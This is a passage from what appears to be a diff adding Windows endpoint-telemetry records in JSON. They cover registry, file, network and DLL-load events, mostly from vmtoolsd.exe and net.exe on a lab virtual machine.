Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570939650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570940430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 
6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570940430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570941050000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570941050000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570941520000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570941520000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570942150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570942150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570942619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570942619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570943240000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570943400000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570943869984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570943869984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570944960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570944960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570946369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570946369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570946680000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570946680000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570946990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570946990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", + "registry_value": "C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", + "timestamp": 131883570947150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware 
Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570947150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-7F44DDFD.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570978250000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "destination_address": "192.168.162.255", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "137", + "subtype": "outgoing", + "timestamp": 131883570966190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.134", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.255", + "source_port": "137", + "subtype": "incoming", + "timestamp": 131883570966190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 6292, + "process_name": "net.exe", + 
"process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": 
"C:\\Windows\\System32\\combase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc6.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "webio.dll", + "image_path": "C:\\Windows\\System32\\webio.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": 
"{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": 